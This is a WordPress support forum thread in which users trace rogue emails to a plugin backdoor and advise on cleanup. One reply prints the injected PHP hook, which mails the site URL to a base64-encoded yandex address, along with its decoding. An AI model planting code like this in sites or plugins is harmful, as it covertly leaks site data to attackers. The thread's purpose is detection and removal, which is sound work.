[closed] Rogue emails (10 posts)

  1. jayc1989
    Posted 3 years ago #

    Hi all, I was checking my maillog for a totally unrelated issue and noticed around 90 emails today have been sent to "wordpressslog@yandex.com". Does anyone know what could be causing this? I first thought a dodgy plugin however I am only running w3 total cache and Yoast SEO.

    *** ENVELOPE RECORDS deferred/A/AEECD628CD ***
    message_size:             577             187               1               0             577
    message_arrival_time: Mon Jun 17 16:04:50 2013
    create_time: Mon Jun 17 16:04:50 2013
    named_attribute: rewrite_context=local
    sender_fullname: Nobody
    sender: nobody@*HOSTNAME*
    *** MESSAGE CONTENTS deferred/A/AEECD628CD ***
    Received: by *HOSTNAME* (Postfix, from userid 99)
            id AEECD628CD; Mon, 17 Jun 2013 16:04:50 +0000 (UTC)
    To: wordpressslog@yandex.com
    Subject: WordPress Plugin
    X-PHP-Originating-Script: 99:class-phpmailer.php
    Date: Mon, 17 Jun 2013 16:04:50 +0000
    From: WordPress <wordpress@_.*DOMAINNAME*>
    Message-ID: <ad562a3fae97df2c538c14f9aadf2b8f@_>
    X-Priority: 3
    X-Mailer: PHPMailer 5.2.1 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
    MIME-Version: 1.0
    Content-Transfer-Encoding: 8bit
    Content-Type: text/plain; charset="UTF-8"
    *** HEADER EXTRACTED deferred/A/AEECD628CD ***
    named_attribute: encoding=8bit
    original_recipient: wordpressslog@yandex.com
    recipient: wordpressslog@yandex.com
    *** MESSAGE FILE END deferred/A/AEECD628CD ***

    Any ideas?


  2. alecoelho
    Posted 3 years ago #

    Hi You could solve this problem? I'm getting the same message you. Thank you.

  3. You may have been hacked. I would scan all the files on my site for 'yandex' or base64 (they like to hide stuff).

    But also get a hold of your webhost and ask them for help tracking down the emails.

  4. Ave Elite
    Posted 3 years ago #

    The code you are looking for is:

    add_action('wp_head','my_wpfunww7c8bb');function my_wpfunww7c8bb(){if(!username_exists('wordpress')){$addressdecode=base64_decode("[ redacted ]");$vari='WordPress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

    It is most likely located in a .php file in your plugin folder:


    Most likely in a file called <langs.php> BUT it can also be in any other PHP file.

    In YOUR case I would read the email more closely as it reveals a possible origin: <X-PHP-Originating-Script: 99:class-phpmailer.php>

    Best way is too create a backup of your site and then download and extract this backup on your local hard drive and then do a text string search with a tool like AstroGrep on ALL files to be sure you find them all and kill 'm all.

    In the above string you find the base64 code: <d29yZHByZXNzc2xvZ0B5YW5kZXguY29t> for <wordpressslog@yandex.com> and also the <SUBJECT> of the email <WordPress Plugin>.

    Maybe somebody with more php knowledge can explain this function in detail as I am sure more and more people will be having the same problem.


  5. Maybe somebody with more php knowledge can explain this function in detail as I am sure more and more people will be having the same problem.

    That's not really the most important thing for you.

    It's good that you found that instance but you really need to identify and close the door that the attacker exploited. If you do not close that door then the attacker will be back and you'll just continue to play whack-a-mole.

    You've found the action but did you find any scripts left behind that will put it back?

    It's not easy but these articles can help you get a handle on your situation.

    You need to start working your way through these resources:

    Anything less will probably result in the hacker walking straight back into your site again.

    Additional Resources:
    Hardening WordPress

  6. Ave Elite
    Posted 3 years ago #

    True words, true words indeed !!!

    But I still hope that with this information many more people can identify the problem on their server or at least give them a heads up.


  7. sakkiotto
    Posted 3 years ago #

    i have this problem...

  8. Andrew Nevins
    Forum moderator
    Posted 3 years ago #

    @sakkiotto, All we can suggest is that you read the advice given.

  9. sakkiotto
    Posted 3 years ago #

    ok , i will try. Thanks

  10. richmanfl
    Posted 2 years ago #


    You hit it right on the nose.... do a sitewide search for base64 and you will find the same string that appears in the message ID: field.

    Good going!

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.